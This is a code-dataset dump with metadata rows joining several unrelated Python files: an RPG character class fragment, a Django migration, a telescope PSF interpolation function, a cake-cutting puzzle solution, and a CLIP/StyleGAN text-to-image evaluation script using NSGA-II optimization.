        self.harm -= level
    def character_setup(self):
        """Run the interactive creation flow (ratings, moves, haven, gear)."""
        self.set_skill_levels()
        self.show_me_the_moves()
        self.make_me_a_haven()
        self.get_me_some_gear()
    def show_me_the_moves(self):
        # To be overwritten in child class
        pass
    def make_me_a_haven(self):
        # To be overwritten in child class
        pass
    def get_me_some_gear(self):
        # To be overwritten in child class
        pass
    def remind_me(self):
        # To be overwritten in child class
        pass
    def improve_me(self):
        # TODO: Implement this.
        pass
    def level_up(self):
        # TODO: Implement this.
        pass
    def set_skill_levels(self):
        """Prompt for each rating, re-prompting until the setter accepts it.

        A rejected value leaves the backing field as None, which keeps the
        per-skill loop running. NOTE(review): the charm branch checks the
        private ``_charm`` while the others check the property — equivalent
        today, but inconsistent.
        """
        for skill in self.skills:
            if skill == "charm":
                while True:
                    level = get_int_input(skill + " level?")
                    self.charm = level
                    if self._charm is not None:
                        break
            elif skill == "cool":
                while True:
                    level = get_int_input(skill + " level?")
                    self.cool = level
                    if self.cool is not None:
                        break
            elif skill == "sharp":
                while True:
                    level = get_int_input(skill + " level?")
                    self.sharp = level
                    if self.sharp is not None:
                        break
            elif skill == "tough":
                while True:
                    level = get_int_input(skill + " level?")
                    self.tough = level
                    if self.tough is not None:
                        break
            elif skill == "weird":
                while True:
                    level = get_int_input(skill + " level?")
                    self.weird = level
                    if self.weird is not None:
                        break
# Library-only module: running it directly is deliberately a no-op.
if __name__ == "__main__":
    pass
| 8,831 | 0 | 935 |
6a08aded68a0728240f0327c01b6231d1050cb75 | 545 | py | Python | squalaetp/migrations/0013_auto_20191004_2034.py | Nels885/csd_dashboard | aa5a3b970c50a2a93af722f962bd87c3728f233c | [
"MIT"
] | null | null | null | squalaetp/migrations/0013_auto_20191004_2034.py | Nels885/csd_dashboard | aa5a3b970c50a2a93af722f962bd87c3728f233c | [
"MIT"
] | null | null | null | squalaetp/migrations/0013_auto_20191004_2034.py | Nels885/csd_dashboard | aa5a3b970c50a2a93af722f962bd87c3728f233c | [
"MIT"
] | null | null | null | # Generated by Django 2.2.5 on 2019-10-04 18:34
from django.db import migrations
| 24.772727 | 89 | 0.588991 | # Generated by Django 2.2.5 on 2019-10-04 18:34
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: set default ordering and verbose names.

    Alters only the Meta options of the ``corvet`` and ``xelon`` models,
    so it touches no data. Do not hand-edit beyond comments.
    """
    dependencies = [
        ('squalaetp', '0012_auto_20190829_1605'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='corvet',
            options={'ordering': ['vin'], 'verbose_name': 'données CORVET'},
        ),
        migrations.AlterModelOptions(
            name='xelon',
            options={'ordering': ['numero_de_dossier'], 'verbose_name': 'dossier Xelon'},
        ),
    ]
| 0 | 440 | 23 |
fef2daf4a0ac0128aa8faa54a5ca0dfef20ab933 | 5,078 | py | Python | 2d_PSF_code/PIPE2D-347/Provide_PSF_2D.py | Subaru-PFS/dev_pfsmodel | d01cf03a4c4eaa01ba5a9590ccf17744a33bdb05 | [
"MIT"
] | null | null | null | 2d_PSF_code/PIPE2D-347/Provide_PSF_2D.py | Subaru-PFS/dev_pfsmodel | d01cf03a4c4eaa01ba5a9590ccf17744a33bdb05 | [
"MIT"
] | null | null | null | 2d_PSF_code/PIPE2D-347/Provide_PSF_2D.py | Subaru-PFS/dev_pfsmodel | d01cf03a4c4eaa01ba5a9590ccf17744a33bdb05 | [
"MIT"
] | null | null | null |
import numpy as np
def provide_PSF_2D(x=None,y=None,PSF_version=None):
    """Provide the 2D PSF at any (x, y) position in the detector plane.

    Takes a finite number of pregenerated PSFs and linearly interpolates,
    in y, between the two simulated PSFs nearest to the requested position.
    (Future: interpolate Zernike coefficients and render on the fly?)
    To be used with the focused data taken on July 25 and 26
    (e.g., 21400 for HgAr, 21604 for Ne, 21808 for Kr).

    Example: ``provide_PSF_2D(10, 2010)`` — x=10, y=2010.

    @param[in] x            x-coordinate
    @param[in] y            y-coordinate
    @param[in] PSF_version  version of the PSF input files
    @returns numpy array, 100x100, oversampled 5 times, corresponding to
             20x20 physical pixels (300x300 microns)
    """
    # on tiger the directory containing the array of PSFs is at:
    DATA_DIRECTORY='/tigress/ncaplar/PIPE2D-450/'
    if PSF_version is None:
        PSF_version='Sep12_v1'
    positions_of_simulation=np.load(DATA_DIRECTORY+\
        'positions_of_simulation_00_from_'+PSF_version+'.npy')
    array_of_simulation=np.load(DATA_DIRECTORY+\
        'array_of_simulation_00_from_'+PSF_version+'.npy')
    # x and y position with simulated PSFs
    x_positions_of_simulation=positions_of_simulation[:,1]
    y_positions_of_simulation=positions_of_simulation[:,2]
    # This is a simple code that finds the closest avaliable PSFs, given the x and y position
    # This will have to be improved in order when we get to work with the full populated dectector plane
    # how far in x-dimension are you willing to search for suitable simulated PSFs
    x_search_distance=20
    # positions of all simulated PSFs in that range
    positions_of_simulation_in_acceptable_x_range=\
        positions_of_simulation[(x_positions_of_simulation<(x+x_search_distance))\
                                &(x_positions_of_simulation>(x-x_search_distance))]
    # if there are no simulated PSF avaliable in the specified x-range we are not able to provide the solution
    if len(positions_of_simulation_in_acceptable_x_range)<2:
        print('No simulated PSFs are avaliable in this x-area of the detector,')
        print('probably because this fiber has not been illuminated;')
        print('returning the closest avaliable PSFs, BUT that is probably not what you want')
        distances=np.sqrt(((x-x_positions_of_simulation)**2+\
                           (y-y_positions_of_simulation)**2).astype(float))
        index_of_closest_distance=np.where(distances[distances==\
                                                     np.min(distances)])[0][0]
        return array_of_simulation[index_of_closest_distance]
    # y-distance from the requested positions for all of the suitable simulated PSFs
    distances_of_y_requested_position_from_avaliable=\
        y-positions_of_simulation_in_acceptable_x_range[:,2]
    # out of the suitable PSFs which 2 are the closest
    index_of_1st_closest_simulated_psf=\
        np.where(np.abs(distances_of_y_requested_position_from_avaliable)==\
                 np.sort(np.abs(distances_of_y_requested_position_from_avaliable))[0])[0][0]
    index_of_2nd_closest_simulated_psf=\
        np.where(np.abs(distances_of_y_requested_position_from_avaliable)==\
                 np.sort(np.abs(distances_of_y_requested_position_from_avaliable))[1])[0][0]
    # where are these 2 closest PSF in the initial table
    # NOTE(review): rows are matched by comparing np.sum over the row — this
    # breaks if two rows happen to share the same sum; match by index instead.
    index_of_1st_closest_simulated_psf_in_positions_of_simulation=\
        np.where(np.sum(positions_of_simulation,axis=1)==\
                 np.sum(positions_of_simulation_in_acceptable_x_range[index_of_1st_closest_simulated_psf]))[0][0]
    index_of_2nd_closest_simulated_psf_in_positions_of_simulation=\
        np.where(np.sum(positions_of_simulation,axis=1)==\
                 np.sum(positions_of_simulation_in_acceptable_x_range[index_of_2nd_closest_simulated_psf]))[0][0]
    # extract the 2 simulated PSFs
    first_array_simulation=\
        array_of_simulation[index_of_1st_closest_simulated_psf_in_positions_of_simulation]
    second_array_simulation=\
        array_of_simulation[index_of_2nd_closest_simulated_psf_in_positions_of_simulation]
    # distance of each PSF from the proposed position
    y1_distance=\
        y-positions_of_simulation[index_of_1st_closest_simulated_psf_in_positions_of_simulation][2]
    y2_distance=\
        y-positions_of_simulation[index_of_2nd_closest_simulated_psf_in_positions_of_simulation][2]
    # if you requested psf at the exact position of existing PSF use that one
    if y1_distance==0:
        return first_array_simulation
    else:
        # create the predicted PSF as a linear interpolation of these two PSFs;
        # algebraically this equals (second*y1 - first*y2) / (y1 - y2), i.e.
        # standard linear interpolation in y. Presumably y1 != y2 because the
        # two nearest PSFs are distinct — TODO confirm (would divide by zero).
        predicted_psf=(second_array_simulation-first_array_simulation*(y2_distance/y1_distance))/(1-y2_distance/y1_distance)
        return predicted_psf
| 52.350515 | 124 | 0.713864 |
import numpy as np
def provide_PSF_2D(x=None,y=None,PSF_version=None):
    """Provide the 2D PSF at any (x, y) position in the detector plane.

    Takes a finite number of pregenerated PSFs and linearly interpolates,
    in y, between the two simulated PSFs nearest to the requested position.
    (Future: interpolate Zernike coefficients and render on the fly?)
    To be used with the focused data taken on July 25 and 26
    (e.g., 21400 for HgAr, 21604 for Ne, 21808 for Kr).

    Example: ``provide_PSF_2D(10, 2010)`` — x=10, y=2010.

    @param[in] x            x-coordinate
    @param[in] y            y-coordinate
    @param[in] PSF_version  version of the PSF input files
    @returns numpy array, 100x100, oversampled 5 times, corresponding to
             20x20 physical pixels (300x300 microns)
    """
    # on tiger the directory containing the array of PSFs is at:
    DATA_DIRECTORY='/tigress/ncaplar/PIPE2D-450/'
    if PSF_version is None:
        PSF_version='Sep12_v1'
    positions_of_simulation=np.load(DATA_DIRECTORY+\
        'positions_of_simulation_00_from_'+PSF_version+'.npy')
    array_of_simulation=np.load(DATA_DIRECTORY+\
        'array_of_simulation_00_from_'+PSF_version+'.npy')
    # x and y position with simulated PSFs
    x_positions_of_simulation=positions_of_simulation[:,1]
    y_positions_of_simulation=positions_of_simulation[:,2]
    # This is a simple code that finds the closest avaliable PSFs, given the x and y position
    # This will have to be improved in order when we get to work with the full populated dectector plane
    # how far in x-dimension are you willing to search for suitable simulated PSFs
    x_search_distance=20
    # positions of all simulated PSFs in that range
    positions_of_simulation_in_acceptable_x_range=\
        positions_of_simulation[(x_positions_of_simulation<(x+x_search_distance))\
                                &(x_positions_of_simulation>(x-x_search_distance))]
    # if there are no simulated PSF avaliable in the specified x-range we are not able to provide the solution
    if len(positions_of_simulation_in_acceptable_x_range)<2:
        print('No simulated PSFs are avaliable in this x-area of the detector,')
        print('probably because this fiber has not been illuminated;')
        print('returning the closest avaliable PSFs, BUT that is probably not what you want')
        distances=np.sqrt(((x-x_positions_of_simulation)**2+\
                           (y-y_positions_of_simulation)**2).astype(float))
        index_of_closest_distance=np.where(distances[distances==\
                                                     np.min(distances)])[0][0]
        return array_of_simulation[index_of_closest_distance]
    # y-distance from the requested positions for all of the suitable simulated PSFs
    distances_of_y_requested_position_from_avaliable=\
        y-positions_of_simulation_in_acceptable_x_range[:,2]
    # out of the suitable PSFs which 2 are the closest
    index_of_1st_closest_simulated_psf=\
        np.where(np.abs(distances_of_y_requested_position_from_avaliable)==\
                 np.sort(np.abs(distances_of_y_requested_position_from_avaliable))[0])[0][0]
    index_of_2nd_closest_simulated_psf=\
        np.where(np.abs(distances_of_y_requested_position_from_avaliable)==\
                 np.sort(np.abs(distances_of_y_requested_position_from_avaliable))[1])[0][0]
    # where are these 2 closest PSF in the initial table
    # NOTE(review): rows are matched by comparing np.sum over the row — this
    # breaks if two rows happen to share the same sum; match by index instead.
    index_of_1st_closest_simulated_psf_in_positions_of_simulation=\
        np.where(np.sum(positions_of_simulation,axis=1)==\
                 np.sum(positions_of_simulation_in_acceptable_x_range[index_of_1st_closest_simulated_psf]))[0][0]
    index_of_2nd_closest_simulated_psf_in_positions_of_simulation=\
        np.where(np.sum(positions_of_simulation,axis=1)==\
                 np.sum(positions_of_simulation_in_acceptable_x_range[index_of_2nd_closest_simulated_psf]))[0][0]
    # extract the 2 simulated PSFs
    first_array_simulation=\
        array_of_simulation[index_of_1st_closest_simulated_psf_in_positions_of_simulation]
    second_array_simulation=\
        array_of_simulation[index_of_2nd_closest_simulated_psf_in_positions_of_simulation]
    # distance of each PSF from the proposed position
    y1_distance=\
        y-positions_of_simulation[index_of_1st_closest_simulated_psf_in_positions_of_simulation][2]
    y2_distance=\
        y-positions_of_simulation[index_of_2nd_closest_simulated_psf_in_positions_of_simulation][2]
    # if you requested psf at the exact position of existing PSF use that one
    if y1_distance==0:
        return first_array_simulation
    else:
        # create the predicted PSF as a linear interpolation of these two PSFs;
        # algebraically this equals (second*y1 - first*y2) / (y1 - y2), i.e.
        # standard linear interpolation in y. Presumably y1 != y2 because the
        # two nearest PSFs are distinct — TODO confirm (would divide by zero).
        predicted_psf=(second_array_simulation-first_array_simulation*(y2_distance/y1_distance))/(1-y2_distance/y1_distance)
        return predicted_psf
| 0 | 0 | 0 |
13933321fe38bfd9e54faf2a5d94361825a6d9ce | 155 | py | Python | Python/PieceOfCake/src/Main.py | Wabri/AKattisProblem | 3780ce312c54b7c01e83e8c6cf6877b6aa24ffcf | [
"MIT"
] | 1 | 2019-03-06T09:24:37.000Z | 2019-03-06T09:24:37.000Z | Python/PieceOfCake/src/Main.py | Wabri/AKattisProblem | 3780ce312c54b7c01e83e8c6cf6877b6aa24ffcf | [
"MIT"
] | null | null | null | Python/PieceOfCake/src/Main.py | Wabri/AKattisProblem | 3780ce312c54b7c01e83e8c6cf6877b6aa24ffcf | [
"MIT"
] | 2 | 2021-05-05T12:01:05.000Z | 2021-09-10T18:35:09.000Z | import sys
# For each "n h v" input line, print the area of the largest piece left by
# one horizontal and one vertical cut: max(h, n-h) * max(v, n-v), scaled by 4.
for line in sys.stdin:
    n, h, v = (int(tok) for tok in line.split())
    print(4 * max(h, n - h) * max(v, n - v))
| 14.090909 | 44 | 0.451613 | import sys
# Each stdin line holds three ints n, h, v; prints max(h, n-h) * max(v, n-v) * 4.
# The factor 4 presumably converts half-unit cut coordinates to area — verify
# against the original problem statement.
for i in sys.stdin:
    ab = i.split()
    n = int(ab[0])
    h = int(ab[1])
    v = int(ab[2])
    print(max(h, n - h) * max(v, n - v) * 4)
| 0 | 0 | 0 |
315ff162a06104a8e332e3d340242a7318f868a6 | 21,635 | py | Python | eval.py | StolasIn/Lafite | a85ad9eec6de6c90ccba63ad3c43e45b0fe5d371 | [
"MIT"
] | null | null | null | eval.py | StolasIn/Lafite | a85ad9eec6de6c90ccba63ad3c43e45b0fe5d371 | [
"MIT"
] | null | null | null | eval.py | StolasIn/Lafite | a85ad9eec6de6c90ccba63ad3c43e45b0fe5d371 | [
"MIT"
] | null | null | null | import torch
import numpy as np
import pickle
import os
from PIL import Image
from pathlib import Path
from tqdm import tqdm
import dnnlib, legacy
import clip
import torch.nn.functional as F
import torchvision.transforms as T
import scipy
import warnings
import torchvision.models
from pymoo.core.problem import Problem
from pymoo.algorithms.moo.nsga2 import NSGA2
from pymoo.factory import get_sampling, get_crossover, get_mutation , get_selection
from pymoo.factory import get_decomposition
from pymoo.util.termination.default import MultiObjectiveDefaultTermination
from pymoo.optimize import minimize
from pymoo.util.display import Display
import time
import sys
import argparse
import shutil
from pymoo.visualization.scatter import Scatter
from numpy.linalg import norm
import matplotlib.pyplot as plt
import json
from qqdm import qqdm, format_str
from attn_loss import attention_lib,losses
import re
# ignore errors
warnings.filterwarnings('ignore')
# gen_model is used to get proper clip model for image genetate
gen_model_name = 'ViT-B/16'
# dis_model is used to grading an image and an text simularity
dis_model_name = 'ViT-L/14@336px'
# for verbose to display processing step
# timing
# generating image
# loading pre-training model
# generating (tensor)image using text feature and noise
# transform tensor into image
# scoring with text and image labels
# pick image with highest score
# generate image score using [text,image,labels]
# get socre from noise
# generate image using noise
# for tournament selection
# CLI entry point: either run the NSGA-II feasible-noise search (-r) and render
# the best pick, or just generate -n images and keep the highest-scoring one.
# NOTE(review): `mcdm` and `ploter` are referenced but not defined in this
# chunk — presumably defined elsewhere in the file; confirm.
if __name__ == '__main__':
    # parser for convenient using
    parser = argparse.ArgumentParser()
    # whether to run get fesiable solution or not
    parser.add_argument('-r', '--run', action='store_true',default = False)
    # setting text
    parser.add_argument('-t', '--text',type = str,default = 'a dog lying on an orange couch in the living room.')
    # setting image generation (for normal generating)
    parser.add_argument('-n', '--num',type = int,default = 10)
    # pick #image
    parser.add_argument('-p', '--pick',type = int,default = 1)
    # get fesiable solution setting
    parser.add_argument('-s', '--set',type = str,default = '1 1 1')
    # draw plot
    parser.add_argument('-d', '--draw',action='store_true',default = False)
    # save memory
    parser.add_argument('-m', '--save_mem',action='store_true',default = False)
    args = parser.parse_args()
    # split setting sentence: "-s 'pop ofs gen'" -> population, offspring, generations
    set_list = args.set
    set_list = set_list.split()
    pop = int(set_list[0])
    ofs = int(set_list[1])
    gen = int(set_list[2])
    t = Timer()
    txt = args.text
    if not os.path.exists('image_result/{}'.format(txt)):
        os.mkdir('image_result/{}'.format(txt))
    # noise.txt is opened here but only written by the commented-out debug line.
    path = 'image_result/{}/noise.txt'.format(txt)
    f = open(path, 'w')
    print('generate text = {}'.format(txt))
    # run get fesiable solution
    if args.run==True :
        print('find fes : pop = {} , ofs = {} , gen = {}'.format(pop,ofs,gen))
        res = get_fes(txt = txt,pop = pop, ofs = ofs,gen = gen)
        # np.set_printoptions(threshold=sys.maxsize)
        # print(res.X,file = f)
        # draw pareto front
        if args.draw == True:
            ploter(res.F)
        # generating image from res.X (nds)
        # gen_from_noises(txt = txt,noises = res.X)
        # Multi-Criteria Decision Making
        best_res_id = mcdm(res)
        gen_from_noises(txt = txt,noises = np.array([res.X[best_res_id]]),name = 'best_pick')
        # store memory
        if args.save_mem == True:
            make_memory(txt = txt,noise = res.X[best_res_id])
        # gen_from_noises(txt = txt,noises = np.array([noise_memory(txt = txt,pop = 1,pick = True)]),name = '123')
    else :
        print('generate {} images'.format(args.num))
        gen_scored(txt = txt,image_n = args.num)
    t.print_time()
    f.close()
import numpy as np
import pickle
import os
from PIL import Image
from pathlib import Path
from tqdm import tqdm
import dnnlib, legacy
import clip
import torch.nn.functional as F
import torchvision.transforms as T
import scipy
import warnings
import torchvision.models
from pymoo.core.problem import Problem
from pymoo.algorithms.moo.nsga2 import NSGA2
from pymoo.factory import get_sampling, get_crossover, get_mutation , get_selection
from pymoo.factory import get_decomposition
from pymoo.util.termination.default import MultiObjectiveDefaultTermination
from pymoo.optimize import minimize
from pymoo.util.display import Display
import time
import sys
import argparse
import shutil
from pymoo.visualization.scatter import Scatter
from numpy.linalg import norm
import matplotlib.pyplot as plt
import json
from qqdm import qqdm, format_str
from attn_loss import attention_lib,losses
import re
# ignore errors
warnings.filterwarnings('ignore')
# gen_model is used to get proper clip model for image genetate
gen_model_name = 'ViT-B/16'
# dis_model is used to grading an image and an text simularity
dis_model_name = 'ViT-L/14@336px'
# for verbose to display processing step
class MyDisplay(Display):
    """pymoo progress display with extra per-generation score columns."""
    def _do(self, problem, evaluator, algorithm):
        super()._do(problem, evaluator, algorithm)
        # number of non-dominated solutions in the current optimum set
        self.output.append('n_nds', len(algorithm.opt))
        # mean total score of the population (objectives are negated scores)
        self.output.append('mean_score', -int(np.mean(np.sum(algorithm.pop.get('F'),axis = 1))))
        # best (maximum) total score in the population
        self.output.append('max_score', -int(np.min(np.sum(algorithm.pop.get('F'),axis = 1))))
class MyProblem(Problem):
    """pymoo problem: optimize a 512-d latent noise vector for a text prompt.

    Each decision vector is a latent z bounded to [-4, 4]^512 (roughly the
    support of a standard normal draw). The three objectives are the negated
    text-image, image-realism and text-label scores from
    ``get_score_from_noises``, so pymoo's minimization maximizes the scores.
    """
    def __init__(self,txt):
        # prompt used when scoring every candidate noise vector
        self.txt = txt
        super().__init__(n_var=512, # number of decision variables (latent dim)
                         n_obj=3,   # number of objectives
                         # [-4, 4] approximates the range of a Gaussian draw
                         xl=-4,     # lower bound
                         xu=4       # upper bound
                         )
    def _evaluate(self, x, out, *args, **kwargs):
        """Score each candidate noise row and stack the negated objectives."""
        # returns (text_image, image_real, image_label, text_label) score lists;
        # image_label is currently unused
        text_image,image_real,_,text_label = get_score_from_noises(txt = self.txt,noises = torch.from_numpy(x))
        f1 = np.array(text_image)
        f2 = np.array(image_real)
        # f3 = np.array(image_label)
        f4 = np.array(text_label)
        # Fix: np.float was removed in NumPy 1.24+; the builtin float is what
        # the alias pointed to.
        out['F'] = np.column_stack([f1, f2, f4]).astype(float)
# timing
class Timer:
    """Wall-clock stopwatch reporting elapsed seconds between checkpoints."""
    def __init__(self):
        # start_time: creation/reset instant; current_time: last checkpoint
        self.start_time = time.time()
        self.current_time = time.time()
    def print_time(self):
        """Print seconds since the last checkpoint, then advance the checkpoint."""
        print('processing {:.0f} seconds'.format(time.time() - self.current_time))
        # Bug fix: the original assigned to a *local* `current_time`, so the
        # checkpoint never advanced; persist it on the instance.
        self.current_time = time.time()
    def set_time(self):
        """Reset both the start time and the checkpoint to now."""
        self.start_time = time.time()
        self.current_time = time.time()
# generating image
class Generator:
    """Wrapper around a pre-trained Lafite/StyleGAN network loaded from a pickle.

    Exposes the EMA generator (`G_ema`) for synthesis and keeps the
    discriminator (`D`) around on the same device.
    """
    def __init__(self, device, path):
        self.name = 'generator'
        # load_model also sets self.G_ema and self.D as side effects
        self.model = self.load_model(device, path)
        self.device = device
        # when True, forces fp32 synthesis (passed through as force_fp32)
        self.force_32 = False
    # loading pre-training model
    def load_model(self, device, path):
        """Load the pickled network from *path* and return its EMA generator."""
        with dnnlib.util.open_url(path) as f:
            network= legacy.load_network_pkl(f)
            self.G_ema = network['G_ema'].to(device)
            self.D = network['D'].to(device)
        return self.G_ema
    # generating (tensor)image using text feature and noise
    def generate(self, z, c, fts, noise_mode='const', return_styles=True):
        """Synthesize an image tensor from latent *z*, label *c* and CLIP features *fts*."""
        return self.model(z, c, fts=fts, noise_mode=noise_mode, return_styles=return_styles, force_fp32=self.force_32)
    def generate_from_style(self, style, noise_mode='const'):
        """Synthesize directly from a style code, with random (unused) ws."""
        ws = torch.randn(1, self.model.num_ws, 512)
        return self.model.synthesis(ws, fts=None, styles=style, noise_mode=noise_mode, force_fp32=self.force_32)
    # transform tensor into image
    def tensor_to_img(self, tensor):
        """Map a [-1, 1] NCHW image batch to one PIL image (batch tiled horizontally)."""
        img = torch.clamp((tensor + 1.) * 127.5, 0., 255.)
        img_list = img.permute(0, 2, 3, 1)
        img_list = [img for img in img_list]
        return Image.fromarray(torch.cat(img_list, dim=-2).detach().cpu().numpy().astype(np.uint8))
def get_txt_fts(txt = '',model = None):
    """Tokenize *txt* and return its unit-normalized CLIP text embedding."""
    device = 'cuda:0'
    tokens = clip.tokenize([txt]).to(device)
    features = model.encode_text(tokens)
    return features / features.norm(dim=-1, keepdim=True)
def get_img_fts(img = None,model = None,preprocess = None):
    """Encode a PIL image into a unit-normalized CLIP image embedding.

    :param img: PIL image to encode
    :param model: a loaded CLIP model exposing ``encode_image``
    :param preprocess: the CLIP preprocessing transform for *model*
    :returns: normalized image-feature tensor on cuda:0
    """
    device = 'cuda:0'
    # Bug fix: the original referenced an undefined name ``image`` and would
    # raise NameError on every call; use the ``img`` parameter callers pass.
    img = preprocess(img).unsqueeze(0).to(device)
    img_fts = model.encode_image(img)
    img_fts /= img_fts.norm(dim=-1, keepdim=True)
    return img_fts
def get_img(txt = '',noise = None,model = None):
    """Render one PIL image for prompt *txt* from latent *noise* via Lafite.

    NOTE(review): this constructs a fresh Generator (re-loading the checkpoint
    from disk) on every call — expensive; consider caching the Generator.
    """
    device = 'cuda:0'
    path = './checkpoints/COCO2014_CLIP_ViTB16_best_FID_8.12.pkl' # pre-trained model
    generator = Generator(device=device, path=path)
    txt_fts = get_txt_fts(txt,model = model)
    # random (1, 1) conditioning vector; semantics defined by the network
    c = torch.randn((1, 1)).to(device)
    img, _ = generator.generate(z=noise, c=c, fts=txt_fts)
    img = generator.tensor_to_img(img)
    return img
def process_img_name(txt = ''):
    """Sanitize *txt* for use as a file name: spaces/commas/slashes become
    underscores and periods are dropped."""
    return txt.translate(str.maketrans({' ': '_', ',': '_', '/': '_', '.': ''}))
def cosine_similarity(fts1 = None,fts2 = None):
    """Cosine similarity between two 1-D feature vectors."""
    denom = norm(fts1) * norm(fts2)
    return np.dot(fts1, fts2) / denom
def gen_images(txt = ''):
    """Generate one image for *txt* from a random latent and save it to
    ./image_result/<sanitized prompt>.png.

    NOTE(review): ``txt_fts`` is computed here but never used — get_img
    re-derives the text features internally; confirm before removing.
    """
    with torch.no_grad():
        device = 'cuda:0'
        clip_model, _ = clip.load(gen_model_name, device=device,jit=False)
        clip_model = clip_model.eval()
        txt_fts = get_txt_fts(txt = txt,model = clip_model)
        z = torch.randn((1, 512)).to(device)
        img = get_img(txt = txt,noise = z,model = clip_model)
        img.save('./image_result/{}.png'.format(process_img_name(txt)))
# scoring with text and image labels
def get_text_label_score(txt = '',label = None):
    """Return 100x the best cosine similarity between *label* and any single
    word of *txt*, using the discriminator CLIP model's text encoder.

    NOTE(review): the CLIP model is re-loaded on every call — expensive.
    """
    device = 'cuda:0'
    # cosine similarity lies in [-1, 1]; -2 is a safe "below any" sentinel
    ma = -2
    clip_model, preprocess = clip.load(dis_model_name, device=device,jit=False)
    label_features = get_txt_fts(txt = label,model = clip_model)
    label_features = label_features.detach().cpu().numpy().flatten()
    # calculate cos similarity between word embedding and label embedding
    for word in txt.split():
        word_features = get_txt_fts(txt = word,model = clip_model)
        word_features = word_features.detach().cpu().numpy().flatten()
        sim = cosine_similarity(label_features,word_features)
        ma = max(ma,sim)
    return ma*100
def get_text_image_score(txt = '',img = None):
    """Return the CLIP logit for (*img*, *txt*) under the discriminator model
    (higher means the caption fits the image better)."""
    device = 'cuda:0'
    clip_model, preprocess = clip.load(dis_model_name, device=device, jit=False) # use jit = false
    clip_model = clip_model.eval()
    tokenized_text = clip.tokenize([txt]).to(device)
    img = preprocess(img).unsqueeze(0).to(device)
    # calling the CLIP model returns (logits_per_image, logits_per_text)
    text_score = clip_model(img,tokenized_text)
    return text_score[0].item()
# pick image with highest score
def gen_scored(txt = '',image_n = 10):
    """Generate *image_n* candidates for *txt* and save only the one with the
    highest total score (filename carries the score)."""
    with torch.no_grad():
        device = 'cuda:0'
        clip_model,_ = clip.load(gen_model_name, device=device,jit=False)
        clip_model = clip_model.eval()
        txt_fts = get_txt_fts(txt = txt,model = clip_model)
        # running best total score; real scores exceed -1
        ma = -1
        for i in tqdm(range(image_n)):
            z = torch.randn((1, 512)).to(device)
            img = get_img(txt = txt,noise = z,model = clip_model)
            score = get_score(txt = txt,img = img)
            if sum(score.values())>ma:
                ma = sum(score.values())
                best_img = img
        best_img.save('./image_result/{}-{:.2f}.png'.format(process_img_name(txt),ma))
# generate image score using [text,image,labels]
def get_score(txt = '', img = None):
    """Score *img* against prompt *txt* on four criteria.

    Returns a dict with keys 'text_image' (CLIP logit), 'image_real'
    (summed VGG19 top-10 class confidence x100), 'image_label' (currently
    always 0 — its accumulation is commented out) and 'text_label'
    (mean best word/label similarity over the top-10 ImageNet classes).

    NOTE(review): ``region_word_loss`` is not defined in this module's
    visible imports — confirm where it comes from; as written this line
    may raise NameError.
    """
    loss = region_word_loss(txt = txt,img = img)
    print(loss)
    # text_image_score (clip score)
    device = 'cuda:0'
    text_image_score = get_text_image_score(txt = txt,img = img)
    # (vgg19_bn score) — re-downloaded/loaded from torch hub on every call
    model = torch.hub.load('pytorch/vision:v0.10.0', 'vgg19_bn', pretrained=True)
    model.eval()
    preprocess = T.Compose([
        T.Resize(256),
        T.CenterCrop(224),
        T.ToTensor(),
        T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
    ])
    input_tensor = preprocess(img)
    input_batch = input_tensor.unsqueeze(0)
    input_batch = input_batch.to(device)
    model.to(device)
    with torch.no_grad():
        output = model(input_batch)
    probabilities = torch.nn.functional.softmax(output[0], dim=0)
    image_real_score = 0
    image_label_score = 0
    text_label_score = 0
    # Read the categories
    with open('./text_labels/imagenet_classes.txt', 'r') as f:
        categories = [s.strip() for s in f.readlines()]
    top10_prob, top10_catid = torch.topk(probabilities, 10)
    for i in range(len(top10_prob)):
        # image_real_score
        # to scoring image with realistic
        image_real_score += top10_prob[i].item()*100
        # image_label_score
        # to scoring image with text and image similarity
        #image_label_score += get_text_image_score(txt = categories[top10_catid[i]],img = img)
        # text_label_score
        # to scoring image with all words and label similarity
        text_label_score += get_text_label_score(txt = txt,label = categories[top10_catid[i]])
    # image_label_score/=10
    text_label_score/=10
    maper = {'text_image':text_image_score,
             'image_real':image_real_score,
             'image_label':image_label_score,
             'text_label':text_label_score}
    return maper
# get socre from noise
def get_score_from_noises(txt = '',noises = None):
    """Render and score each latent row of *noises* for prompt *txt*.

    Returns four parallel lists of NEGATED scores (for pymoo minimization):
    (text_image, image_real, image_label, text_label). The image_label list
    stays empty because its append is commented out.
    """
    with torch.no_grad():
        device = 'cuda:0'
        noises = noises.to(device)
        clip_model,_ = clip.load(gen_model_name, device=device,jit=False)
        clip_model = clip_model.eval()
        txt_fts = get_txt_fts(txt = txt,model = clip_model)
        # score list
        text_image_scores = []
        image_real_scores = []
        image_label_scores = []
        text_label_scores = []
        for noise in noises:
            noise = noise.view(1,-1)
            img = get_img(txt = txt,noise = noise,model = clip_model)
            score = get_score(txt = txt,img = img)
            # negate: lower objective value == better image
            text_image_scores.append(-score['text_image'])
            image_real_scores.append(-score['image_real'])
            #image_label_scores.append(-score['image_label'])
            text_label_scores.append(-score['text_label'])
        return text_image_scores,image_real_scores,image_label_scores,text_label_scores
# generate image using noise
def gen_from_noises(txt = '',noises = None,name = None):
    """Render each numpy latent in *noises* for *txt* and save the images
    under ./image_result/<txt>/, with the total score (and optional *name*
    prefix) in the filename."""
    with torch.no_grad():
        device = 'cuda:0'
        clip_model, _ = clip.load(gen_model_name, device=device,jit=False)
        clip_model = clip_model.eval()
        txt_fts = get_txt_fts(txt = txt,model = clip_model)
        score = {}
        for noise in noises:
            noise = torch.from_numpy(noise).to(device)
            noise = noise.view(1,-1)
            img = get_img(txt = txt,noise = noise,model = clip_model)
            score = get_score(txt = txt,img = img)
            if name is None:
                img.save('./image_result/{}/{:.2f}.png'.format(txt,(sum(score.values()))))
            else:
                img.save('./image_result/{}/{}-{:.2f}.png'.format(txt,name,(sum(score.values()))))
# for tournament selection
def binary_tournament(pop, P, algorithm, **kwargs):
    """Binary tournament selection on summed objective values (minimization).

    :param pop: indexable population; each individual exposes objectives ``.F``
    :param P: int array of shape (n_tournaments, 2) with competitor index pairs
    :param algorithm: unused; required by pymoo's selection-function signature
    :returns: int array of the winning index per tournament (smaller F-sum wins)
    :raises Exception: if a tournament has other than exactly 2 competitors
    """
    n_tournaments, n_competitors = P.shape
    if n_competitors != 2:
